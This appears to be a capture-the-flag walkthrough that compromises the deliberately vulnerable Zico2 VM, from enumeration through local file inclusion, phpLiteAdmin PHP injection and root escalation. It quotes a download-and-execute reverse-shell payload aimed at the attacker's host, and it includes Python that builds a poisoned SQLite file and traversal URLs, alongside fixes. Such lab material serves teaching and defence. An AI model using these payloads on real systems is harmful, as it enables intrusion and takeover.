ZICO 2
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfu1J5dXI1OxdLe-e1V03rXyKNtjI6ikGmTud7IJxKwYNFLYyT-UyV1jpmBr2GT6hare_1j_9DB3Hotcj1P1zMTgOm4XHkA4XO20ypMHtM6zAaSKbMoD8btvVRZA2WRuTnVDvdC383EKHN/s1600/screenshot.57.jpg)
1 - INTRODUCTION
- The goal of this exercise is to work through a complete attack path against the vulnerable machine Zico2, from enumeration to root.
- Zico2 can be downloaded from here:
https://www.vulnhub.com/entry/zico2-1,210/
- Once downloaded and imported into VMware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh63bc4Pl5OVDzxUPv82RA7CkVMr6KMJXipdhuo9tdz2tAkVQ8fvsxzc5ErhWEnnkUrigjcchfWdbRRUC87PkIOmJ70YtBYCIfKX_GYmlRZQ1lsWQQcOHQOsn3v04p_-iHhHqoYb70XikES/s1600/screenshot.2.jpg)
2 - ENUMERATION
- Finding Zico2's IP address:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVF5Br0MX-9rODlP9aAUH2HsfupoOc5D_prHSlXHJtBJ6loArdTifZ4AHaGLUgy2jLBLHc5Nhav3rs_jrV_mc-8Ho34vlUsNYnJg5oMuP6wcv-F6o0zxcF7w0-z2yE1szEGDZW_HW2APR/s1600/screenshot.27.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPehVXkueDYpZETfD6lRJPl3UUMj5JWnTtXU1s4iBdEuikbhgLIqNzOxlg30u9fCPeAm_ODWhGiXwGfEN9YCpAIaitEDXRYkGVYKnB3iUH6CHs6bRhbgWmRzzvV1u1KgO3_kGx4UThR44y/s1600/screenshot.28.jpg)
- Directory brute-forcing the web server reveals an interesting folder, /dbadmin:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyJcgQshn6tANgA4FyhvecravQhKzVmgnu9yU9Z5d-M4PeVzqWmA5Nwj8BqyKH0M2sfgeuRLJYoNZ2DJVNNOaDRplYkNl3xfmp0ge23IdCFzWiPbNRnRmsowW1PofSI_dIbBNt5Iaimpv2/s1600/screenshot.30.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhExd-zjTt8vLhCIcZS2ZHSASAgUTXYLv2MpFaMZtgYIIM4HxXtU3aQ3czWm_UTgyFQuR0EBztdgrR7Is5XQx4fORlyS2bDrtlpcWWGEIf3RGE1WEpRLOeKoRO_IxbqNEIdMmDSJjy0ku/s1600/screenshot.31.jpg)
- Running dirsearch.py also turns up view.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0SKewBmBI7NxYww_4laT8n0to-cQjgoA5hF-SQiXw0JNt34h3hhvCJzDkf9Dp6eTUKD_RRxkqqNgwmr1DGthTd9T3vKt34EumDLOOtU9jTmUkUqVkLiQnX4j5SseO2gZANEBrKGKpaC_7/s1600/screenshot.59.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggvTO7izLcp2rbtJVIdGW4dFgZ5ZziblHHfmGYafEz75G5P92vYxZpFKkYgbyZaPHt8zJuGOnNlJpZagE1n2ssdGsJhEVPHD90MO5m7QUSRQEDZ7JMu2jrnjqo_mJ0fgkHrNc5cxHrGP7A/s1600/screenshot.60.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjICcgftd1l0FZbGlLbJpC5qx3cuBQZb9vBoKOwMizy6YQsiq5mGOTmm_4Ac-hLGwBX5zlhg9eX1M66nwzi55Pv2AdqMfnFTy-fj0-d71z-a4SILWaAWVLLj8ej8tI9ryCf_GTz7IIBLCu/s1600/screenshot.61.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunQCOUO7hkyQwYWHj6OAVVWr5jszJndarNb6LzvFtFNdzd-YBSnej5CCUFLjMjTJd4k6SMkz4tDh5CC6oo1folmEVSdLB1HJq4XqlEc_ZcBg9VESGY7DHavIGdT09ZFsCOmbmkPkVgbGs/s1600/screenshot.63.jpg)
- Let's explore both view.php and /dbadmin.
- Browsing to the web server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7E93G_d63v1EPWo-P3V8daBLQ30qj7ke6kzN4F9hD-9SxOvuA7xTNTBqs61IU7pA2VkGWAZ6-ZVuMv27MsNA8Ss8C3Jjr96p-p9-r4tLk-KoxSEiGllpWKMErnjs94VjAS_5XC4N9mEGN/s640/screenshot.32.jpg)
- Scrolling down and clicking the "tools" link:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuRejFiKJRTiJsL402wKWZ_pvHPfWUuliwh6ZliadpuVSng9tYu70hWUidg5C1TZOu1OlCveohiv-wcE-yUlbrDxA2qTIbGyZmJ2nKVFu_oZ-T9Ojosz-vn5Pi03Zjsi5jcTzD5vga-JAL/s640/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqa8VMIx09IZvrLY6EZ0D2XnadASPUdlM1CwNaN4-7mR_Uw0esBkEwKwPEADE1YziGhyphenhyphenAY7hrdsGvCsypXK_vLd-SCdvIzlwC0EdwqvcyZ_e_Ab0zmA_cIK6UqNaf3d3OySgNBBX6kFNpG/s1600/screenshot.44.jpg)
- view.php takes a file name from the query string, which suggests trying a Local File Inclusion through directory path traversal:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKYiRyA85t-_b7YZD5qCgQoqn_OiUTQpSFpQP9cGDg8yJkuTaUJ8KxAMcU7br2we0Eo-SBfRDel3DwW8JJ8yHeywIXgiwGyAv0BPRZmjMDayjTTA8hChguZC_7WoztRrq88a0oxzqnKSfl/s1600/screenshot.45.jpg)
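The traversal above works because view.php joins the request value onto a base directory without checking where the result ends up. The following Python is an added example, not code from the original post or from the Zico2 VM: it models the vulnerable join next to the hardened version and builds the probe URL used here. The web root (/var/www) and the query parameter name (page) are assumptions, not facts taken from the walkthrough.

```python
import os
import urllib.parse
from typing import Optional

WEBROOT = "/var/www"   # assumed document root on Zico2; not stated in the post
PARAM = "page"         # assumed name of the view.php query parameter


def vulnerable_include(page: str, webroot: str = WEBROOT) -> str:
    """Mirror of an include() that joins the request value onto a base
    directory with no validation: '..' segments walk out of the web root,
    and an absolute value replaces the base entirely."""
    return os.path.normpath(os.path.join(webroot, page))


def hardened_include(page: str, webroot: str = WEBROOT) -> Optional[str]:
    """Same join, then canonicalise and refuse anything outside the web root
    (a real handler would answer 403 where this returns None). commonpath is
    used instead of startswith so /var/wwwroot is not mistaken for /var/www."""
    candidate = os.path.normpath(os.path.join(webroot, page))
    if os.path.commonpath([webroot, candidate]) != webroot:
        return None
    return candidate


def traversal_probe(target: str, depth: int = 4) -> str:
    """The classic first probe: enough '../' to be sure of reaching '/',
    then /etc/passwd. Extra '../' past the root are harmless, which is why
    over-counting is the usual choice."""
    path = "../" * depth + "etc/passwd"
    return "http://%s/view.php?%s=%s" % (target, PARAM, urllib.parse.quote(path, safe="/"))


if __name__ == "__main__":
    print(vulnerable_include("../../../../etc/passwd"))
    print(hardened_include("../../../../etc/passwd"))
    print(traversal_probe("TARGET_IP"))
```

The same check is the fix on the PHP side: resolve with realpath() and compare against the web root before calling include(); a file-name allowlist is stricter still and is what a page like view.php actually needs.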
- Now it's time to explore dbadmin:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhpgL0eoueKIgwj58lYyqjayQ38ZcmwD_ls-Y-mzwqYXsYE-P2yGc924P3EJsCVDysY_sfxJDG9HLKMEXdNRPX0E5I4NF53rGBNmHNhLtVnbN2orouyF20JpBjKmqAdeYDkyz67IN2Slne/s1600/screenshot.33.jpg)
- Clicking test_db.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaN0juUuNoD7bymu8zdQxiFCvkiVZBKvnrSEQbY3IGCfvCj1jpyU4V02oUOzo33auBg88AVzkhD26Q-3oiDzacaAcsVhCgqrx4VLozv7CkepQQlwFPwV1JajDJPC401GC8ZsbVfQ2bi9_y/s1600/screenshot.34.jpg)
- The default password for phpLiteAdmin is admin:
https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPORTmziDCki1qLJOrzm-v0JKKAAcZvZoNIK_s12hHVLUCYuTG-oLNDvPIzzgw_lBEhEELWaQ-_HzNcE5Fv_qabmckjOskZ06C2yfty4SsMwLc_zcStSzXevqr_6voVsn1k2vb9c4H4cZ5/s1600/screenshot.35.jpg)
- Once logged in, it is possible to create new databases:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsvM-rRMxYj6eazK-M2b3iQ35-Yn_4wFP15sbjOgdDR7Tvq-pG1k-FLX0GitMyXNtSfE0-snLzMGbQRZv5ADfnWIHAO-HBV-IOSTGmkLQI5DWgsbVHD9Wjh4_PMTZpw0IfFeiAKakmBEy_/s1600/screenshot.58.jpg)
3 - EXPLOITATION - REMOTE PHP CODE INJECTION
- Searching for phpLiteAdmin vulnerabilities turns up a Remote PHP Code Injection exploit, which allows PHP code to be injected into a file on the server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvpg4pOTt5SeTExXUssM3236WSZV2Lyjy_Y6XugSrva-Cc67wKjk6JzR0x5lm6txijH3TgqjOdMCLLBe1kwMKpR8t32alCRRWvoif0MXsf3DlBbBfLAjdw_aYGO_8rEm3ddZxxPuY9bAKM/s1600/screenshot.46.jpg)
- Reading the first lines of the 24044.txt exploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxrICOX8B94KqLDICxQg5s3yy8xA7XGtGEXtC8ZNPQK9pumYDJKbjzIfRaJbYUxZfo_wD1nw9oTM919ekpfVFY6_2dcs_egBfZ55ZE-Qb7u8Xbzobfo0Va2bmDmgUL9t-HSepIcK3tIcH/s1600/screenshot.48.jpg)
- The same entry on exploit-db:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17uPxK1S_tpvE_-_ASB364SFApZvdsy0AvI-da4IW7oBOcYpyRp5Av47geNo2eop93eF4o9Z1g7VlrtkZ0O3ZgSBUQg7EQvsxpa-siufPTRWnbPgXB_bggpLckofCHNpYXHYaWePFfI4O/s1600/screenshot.49.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBdwxNrRW7bV2huCprcCv_E_QOMa6u-ENFCI_J6-ZGzt3i-MvKYNnv_TANoLsi8W-Cxh90w-cdgSixyOcQbaynKbADEZECkYeGJ_7fyx7HK3tt6tK3GdVoGeJDYKNYZ2598dLdlxJw_iB/s640/screenshot.50.jpg)
- Following the exploit's instructions, we create a new database named hack.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIZWcpFWqYM7mN58VNtTt48rQN4G1L0VowZY6ZHyO7BVW-ONdBxTSxPoRe1yDxXdRi-MC3J7YHYJiqkERDPU0wakLj40YEtezVgNcGq0VYk0CYoER4ETDXxwfMNJMPokvYJT-GKq_jMrb7/s400/screenshot.36.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWooLe6jSHjpBZLt-7-5Ei-cN2uhHQhf-6_2bo-50wmMfxLQgwcvenQMxVqYpCnANz0MBjUGL_Bzt0WNbENakMaPDHzHqMWtkg2AA0kpF_H0koE6T4CRvJp3sSmJJovw7ZTfcJxtVuAoS/s400/screenshot.37.jpg)
- Adding a test table named prueba:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhajT5HjIWxIqcKAJ_4TEw1unrY4r343LOSK_nTTrFK9J-meLNlBwN5_1sLqm7dOViTdMEMWYYA7fEysnAPsKqlxqRjl_cK-iD1w54wyQwToaMMS_ksHUbDmn6UB798Z4359X1oEKZHduU7/s1600/screenshot.51.jpg)
- Entering <?php phpinfo()?> as the field's Default Value:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglI1CvHiBN9o1poTO3kC8VKJjdgXI2F864MQBrR2By458ipluX1IO3yOYLQ87qoT9hn71-BgV03DbSrHxgTADGGhMSsN3wPGmrkKuB26zUPqRLB3UMvHTFvdGMXB9HNQzsxNxwoh1vxlWH/s1600/screenshot.52.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRYyjGf4dsZAfUOMDUFIkw8raiHVTgrbR76MIM9JGBB3AhMqxmal94JRxZ-6mXOxVPGgS4YdRPNIRMolM3qrj9PbGKpfPIm-4b12kn9hl6bXVuUO2T0XzuFXGXtLcWUCrBMfsGfWlGjQm/s400/screenshot.53.jpg)
- Including the newly created database file through the LFI in view.php executes the embedded PHP, which confirms that the exploit works:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3ZQENDpTpkwC41Igg0Wwmj9LcaZN2inASg0Ub51E_FPhiRqG175OyyiKQQ3mfYfBm3U20oWpZp9Kh-9guJ2zH8Ag74ZuV8CaxpicorgUxbjcgY1P15yOD4RgnC9zP9V2opXCCyFpOA57e/s1600/screenshot.54.jpg)
- We can take this further and use the Remote PHP Code Injection to fetch a payload and spawn a reverse shell.
- Generating the payload with msfvenom:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOoSRSg0QVdhFOqLHGMZzLhsgf5U1T-OPXVPEyNQeTsSDF5LD4wn3z80x9hFzUEiqHqC3NdKD8eK0RbobcT_h4Mr87Uo0kgg02fjRVKgZ-PB9Jr2lVvfSFyX-4feGlkb0ZksH2IV_eMJCb/s1600/screenshot.3.jpg)
- Giving the payload execute permission:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhycYLRxIxWusrfhAfh1SzMUoXf_TY3lz4YIL5z3K4J43wd1Fvr4qjuWYxC2cm-GhrXbIMsdMLsMQaPi4411lc2j8wHxzTvlPirR_7Lojyp6ZxiPbIOinAVvPEBBCt8lVFa7dJcHRkou2kd/s1600/screenshot.6.jpg)
- Setting up the Meterpreter handler:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2lbkrHbL5hA2Qal84lnmS89rp19XnhcWX0ehT4t6LlNBORIVdxv5tJZ_1nx6ANWFXG8lEO-SIkifAJWv15UGAIf-k72P2Kf7o0ZMWTjSFYjgw0BUBeu1RKqKm5lbefrKyQ_Xoifq8hcsi/s1600/screenshot.5.jpg)
- Creating table 1 in database /usr/databases/hack.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmjMJOdJJq0Iid4aD7oOqL_1dzKvgO4fBaY7J7acCg1XrUthzsGDUGa6ByS4o_zh_SbuxvgJJ349jJyaNZOwVITuesOCnyUjm3JEDRgLYcMzHfEiVePwDEfaiozxuocu2246Ww3Dcybm_w/s1600/screenshot.38.jpg)
- The Default Value entered for Field 1 deserves a closer look, since it chains several commands inside a single call:
- system() -> executes an external program and displays its output
- cd /tmp -> change to the writable folder /tmp
- wget http://192.168.1.19:8000/myshell -> fetch the payload from Kali (192.168.1.19, serving on port 8000) onto Zico2
- chmod 755 myshell -> make the payload executable
- ./myshell -> run the payload, which connects back to the handler
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha63qqtsQuH0AYbovklrZE9QohOA-SIHTcm0NbIgp59TffGsJ_3VR4jmJ0yG48rXKOZBJTGNhDQ07oY3MhZTEdfJo8LAyNwMYp4oBs46az6KWS0zeHNEdmB0p1AfwMO4nafXEc2AQpzkjI/s1600/screenshot.39.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxC0iz2eNGHAygte7-7jODA0_hzNFkg4UEIZvuzkXW7UWFulvdgQtmAK1t0ClTucp2kO1dczytP_VWdKxzcq74H338ClVNmSqAxZ24mVodLCJW0mKqkVyN5pD2MAph1C8aYy0BXBf1cADG/s1600/screenshot.40.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVpQNek4hLGwO4_SALvLPP1UttvMl-zO4t63epl9wbNs5GndGGk39OIze7BRKkUbuhw0G4vTJHBH3Em1BNiTIOpetpbnnXRPkRxY2IViUHYn3hY9AHs6YkuYYPcIH2F8NcbuiSWgOx8fb/s1600/screenshot.41.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYSDIqUU1wCNXbCK09OLZonYN7PtT2lai4ed4C47U0Bj5vvXz2FSScfLFbdSdmlkOLlTY6lyglSTy_h_ywYGSbRIDJwQffT-xrxkXE4xN1C4Bis7iCHSRTfLO6JlmJ9gKUKmAqjpvSrJAJ/s1600/screenshot.7.jpg)
- Requesting hack.php through the LFI in view.php triggers the payload:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b5CCUigwiAe3jfjN31rfrQxs_yM1LmwnlZ_nZCwdeBWSmH5Wv4lxrNeVWvoe8KjKBFypgN9hITVYP-hcQx905FqD7-21g5f7lZf4L1fJB1UFbNI_sEhc2tVHKF3fNaw0TxDOxN8YhGdZ/s1600/screenshot.8.jpg)
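Why does a SQLite database become a PHP script? SQLite stores the CREATE TABLE text verbatim in its schema table on the first page of the file, so a Default Value of <?php ... ?> lands in the file uncompressed, and PHP's include() echoes the binary around it and executes whatever sits between the tags. The Python below is an added example, not code from the original post or from phpLiteAdmin: it builds such a file with the standard sqlite3 module, extracts exactly what PHP would execute from it, and assembles the trigger URL. The payload string and the /usr/databases location are the post's own; the web root (/var/www) and the parameter name (page) are assumptions.

```python
import os
import re
import sqlite3
import tempfile
from typing import Dict, List

# Payload exactly as the walkthrough describes it; the Kali IP and port are the post's own.
PAYLOAD = ('<?php system("cd /tmp;wget http://192.168.1.19:8000/myshell;'
           'chmod 755 myshell;./myshell"); ?>')

DB_DIR = "/usr/databases"     # where phpLiteAdmin on Zico2 writes new databases (from the post)
WEBROOT = "/var/www"          # assumption: document root that view.php includes relative to
LFI_PARAM = "page"            # assumption: name of the view.php query parameter

PHP_BLOCK = re.compile(rb"<\?php.*?\?>", re.S)


def build_poisoned_db(path: str, payload: str = PAYLOAD) -> None:
    """Create a SQLite file whose table schema carries PHP in a column DEFAULT,
    which is what phpLiteAdmin does with the 'Default Value' field.
    SQLite keeps the CREATE TABLE text verbatim in sqlite_master on page 1,
    so the payload is stored uncompressed and unencoded inside the file."""
    if "'" in payload:
        raise ValueError("a single quote would terminate the DEFAULT literal")
    con = sqlite3.connect(path)
    # Table "1" with field "1", mirroring the names used in the walkthrough.
    con.execute('CREATE TABLE "1" ("1" TEXT DEFAULT \'' + payload + "')")
    con.commit()
    con.close()


def php_blocks(path: str) -> List[str]:
    """Everything a PHP include() of this file would execute: each
    <?php ... ?> block, regardless of the binary bytes around it (those are
    simply echoed to the response, which is the garbage seen before phpinfo())."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [m.decode("latin-1") for m in PHP_BLOCK.findall(data)]


def trigger_url(target: str) -> str:
    """The request that makes view.php include the database file: one '../'
    per web-root component, then the absolute path of the database."""
    depth = len([p for p in WEBROOT.split("/") if p])
    rel = "../" * depth + DB_DIR.lstrip("/") + "/hack.php"
    return "http://%s/view.php?%s=%s" % (target, LFI_PARAM, rel)


def demo() -> Dict[str, object]:
    """Build the file in a temp dir and report what PHP would see in it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "hack.php")
        build_poisoned_db(path)
        with open(path, "rb") as fh:
            header = fh.read(16)
        blocks = php_blocks(path)
    return {"is_sqlite": header.startswith(b"SQLite format 3"),
            "php_blocks": blocks,
            "url": trigger_url("TARGET_IP")}


if __name__ == "__main__":
    print(demo())
```

Two practical caveats follow from this. The payload must not contain a single quote, because phpLiteAdmin wraps the default value in one; and the file is only dangerous because an include() elsewhere will load it, so the fix on the server side is the LFI fix in view.php, plus keeping the phpLiteAdmin database directory outside anything PHP will ever include.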
- As a result, a Meterpreter session is opened:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQx4VUj-9PJCKKOHCLEtyG5OBLZxJ0NL2afk43sYCMj0VdD4xWhjHe0kDPzKly01VoyRj-K-drg4pgNXWnRxTz4DFxQiFuk9NCgZLhRjW_X-Kb5QjBjh2vQm5jzXOZn8Gm-S0vEB3zve8F/s1600/screenshot.12.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLVZffKYOCOYY2Ble7DzxKvJqt-K23hVVgiMaBqK7fCMZrWStLcRkzRxAvj0EceLHL4QUFMaxD-GzXEnaHGRNVChhJxUnnIuP0965tuuhVISom2GXSVV3AwYw7caEBHqe_ZerLxRBmBnc0/s1600/screenshot.13.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq1YAXm00vAcbqhm24-OqLxu_b2g6VJto4FKZO5wX1UeYB70Y6IdOW2MKsuCmnwvAhKE1MAFTzuPLpIK38exYZsTqfskxzpoUGNJmRE5eRWhGmHCk-AO7DIq0yaBEzY2tMdmgGYHFLuHvz/s1600/screenshot.14.jpg)
- Getting a shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1-ufXeWwlyyqTcdBtjVsYI2vpY3VNt0LgogYRaZDvYS1_grzH9CSzyIqgFFHYaUdcVeIhM85lY_KFI9wO77HpwtUsNesB8JdYZ8gOrUZdolI-uqvwud1hSP7c49oR-XkVxJZNtxbc9bgZ/s1600/screenshot.15.jpg)
4 - PRIVILEGE ESCALATION
- Upgrading the shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjOm21HEJkBaSc8pbgb7KXjoyk9FQWnz50zyJ3yqk3r7AF7tP4Bw4A0ioxtTWhnprfpdFNORGzMvBr07CW4bqtdGSVbL-T2E5lTGCymYez1afIakRYd_CdhnphC-EZUjHBTrxQADA3-PAK/s1600/screenshot.16.jpg)
- Let's explore two ways for Privilege Escalation:
4.1 - Kernel exploitation
- The kernel version is vulnerable to the following exploit, which allows Local Privilege Escalation:
www.exploit-db.com/exploits/33589
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0UmzRVzorzwz4Ue_NRjWr9o-LPXTqeO5M2zgA2TJa-6aA_D48-s9BkpK6g2QMNY3CrsXYuWI2mzCTFrSTcsS5Mbeyl8mRlJ1_hd1Ulh4v3AhGa9_GTkdUDWFRkfK5PXQ62xvP4iZ_tNoZ/s1600/screenshot.17.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2b7TDFTh6S3Jyro9bsUydj_AwPgGTk7ptrvk_vpK_0dmYAerSDQI-GblM7NcG2QRzE93c4WnlsQTJhZR7AlQ-HRPQWuL1JRnT17yxWgSlGp5pGAvnO5P7zavGSKHRErt3VwH76VleMNxi/s640/screenshot.18.jpg)
- Copying the C source, vnik.c, to our Kali machine:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqnZOOhGPb7s1LXqEwxI0sn2iharm1JnphPbgBqMSq6asVCDoYiR61WMCu7mcfSyCgsBwTGBG1EvQaSlIMmvV2appyrk-tetCCUm3F35Y0h2oGwPeFH7fYWKWQ5EK6898-RApCQEUT0kJ/s400/screenshot.20.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGlXZGf57vy0ET_v126UJZXPcPkHQ257_uNT4oehJJcYPqF88ncRPa6CMrGS7yb965xpZINFbV0hcEtX4MNSD3w_ylad30cN8fJ5wtvUauq9s3t0Grpf8PpMB9ivYBa5WsQqhFIAk7CTUk/s1600/screenshot.21.jpg)
- Transferring vnik.c from Kali to Zico2:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLQbXjuXM8NP0RJxpvyLt8ziXrz5OKqGFKofWdzbLTy0B2dFPHFGzMjmCKSJYMaIO6lcu-7HFncB523U70aKhsYUpQscrKu2WpZ5FNLdDh87uwH8CGgj_sk5pz95XG_Bn0JMumw_FrC-A2/s1600/screenshot.22.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPCZlZhrKjg9KC0wuTIcn8agd0ozEn_VNVOnudsMCXieLax7oLafqAR_sAlJ8WIA7xNZo1X2ns782ZKX_iO3QljYWDgwb1UqrpupeMbc7sMTRYI4ffkbHg05xRqIOszkannsEqsxR0xX1K/s1600/screenshot.23.jpg)
- Compiling vnik.c according to the instructions in the exploit header:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixhHyzin8-EDkZAbj2sEaq7U2Nj5xfIT7ZWFrhrzRJv752iIafj7UlAFDWUMf95Xk2LPaF0LEOcgIV4QcM6yZgdXYM9i8yc2fOuFx5gE1xJ3_rA-9qmVs8iYjKidjptkHPwKGRGMaZy91D/s1600/screenshot.24.jpg)
- Running vnik gives a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx0B6h_zryjDthLgIJ6Y3-9Jf8UoUC07JDxPMEgHM2-7_0vfziTcA5fNNANvMaDQofQKQfHnSykTHCH_7YRHjCA0SQtOCDbrjDLjhOzOpjOvokNoB3aMH4xtHMvulJD9AxNME3KSXUmZi6/s1600/screenshot.25.jpg)
4.2 - Abusing tar and zip
- Listing /home/zico:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvtD3uZaU1OP43VMv4REoZIZEKcvKpF_R2yfGfedEfbw-QO5rN7xD_Keeu8T2TQ3Iab-eRBFFi9raEoAGfJh2eIugsNdzSNsmXb0-mUPGrahC3JzuDqjcMiMJsQD96Pr2Cok3bUgZd9s4/s1600/screenshot.64.jpg)
- Moving into the wordpress folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFAnjjAJRo0U4e2Vxd-zwwcxPgb0bjnPvGP8vHLcQIFBukkBeCzS9vKT8pCQ0mP-DEnCFyj0lBdEqtwLGe65PBZCDWe2gmrHHxEmPNJayXJE3R9HRZlHjIXvpSWIFgj8Bf9pAswxMCNpf/s1600/screenshot.65.jpg)
- Reading wp-config.php reveals credentials for the user zico:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGeJ1p45OKah5W79x4mUu2bVEzbKs-HOWVGVx-vIt1mDo0kCHsaUJwUTDvsCYKH1TmJtM7lmRScKm7OXPfFk_gtuvRVRlB20W6iBTkAcYJeMexKnGne4laUIOKs5pxaI7A1Ue7G-5nuYYJ/s1600/screenshot.66.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNAKD8hW5p0tFJJQPFXoqOX0lfYNPbn3JaZLIj3Y7YQm85M01DbCWonAl5tqHpznptL8bdQ2iG8JGd0kM-f4E5oviDAuB_0LA4rcxGCjytyTcABcZpZWhpCnwqhcRg4mVN2oFYKLxiLAUa/s1600/screenshot.67.jpg)
- Logging in with these credentials:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMFSjg21SURyFNYbj_u224jUDQ1vn-tGwq-VrHS0UY679XdPw3Tj4Ay_CXPkfuKzTBAA49AtzZvi1har30FFQyUp6cfvftrAksKktrvVAvbGLEcFIKzJJpqus5-qHX87qTDmQjB9aH_XIN/s1600/screenshot.68.jpg)
- sudo -l shows that zico may run /bin/tar and /usr/bin/zip as root:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVai5E4YJASkTuFzeNfhLsBCEGTw_azj8FPnubj1PrbLJlt4zzjS13eJcWw_CrhhxDk_BcADaU291OK5dY15VVAdch4__Y2c05lZa8D0MsD35BrR-cSRaGLfZqSmGxXLMJbcGZzz5toBJi/s1600/screenshot.69.jpg)
- Both tar and zip can execute an external command supplied on their own command line, which turns this sudo rule into root code execution:
http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/
https://www.gnu.org/software/tar/manual/html_section/tar_29.html
- For instance, tar can be used to spawn a root shell like this:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikvq35XZe4bLkBG_wG3AprxlobyolTsDfehPu7kH5FRhhENC7pLyXeo-XgAb-tNXMwn_pAws-iIwMnRmIV7cqIYJ8ELMO9FcI0o8VlnjavOIsfzVx0lLRDZpAbKjddWxaW0Aom-23JGUxB/s1600/screenshot.72.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYMoZsTCRQKo9Mq1pWtudVkufSOBWbQ47ygWHYSr_YEyGsp9MlP1VmFIyUBtjURqOpv1BO4kBpRjezozOOpdd8TRO4toDbb7crTM9wnQNn8J0UWBbzydaYPeLN8WpEeiG564k1gDmZ693/s1600/screenshot.73.jpg)
- In the same way, zip can be used to spawn a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHaQl121giuYuCz-DPR1pLxPG06PbFC04gRSgBpMieIXoKiThVvKM5sFLt88_SGymHLcHezCE7i1I8lyanr4yZveOCKneN9nxLS7tse-a2Itt77KZd0JG0ODGDxcVRinF7XXdRVbb_TJmf/s1600/screenshot.70.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRTi7cs8q8Mmx7vUfxZrkYYmhUYnFNAZicvXm0jrE3j1ek_JnE75ARisOOc3lYpzGzKpvqNDPbngBjsJaEq0dNdH7m3VkLuNO1ENcH_Wuu0bLFBpZPyvg5GAWmtIPeMYCZ8AY8M4QlVl-7/s1600/screenshot.71.jpg)
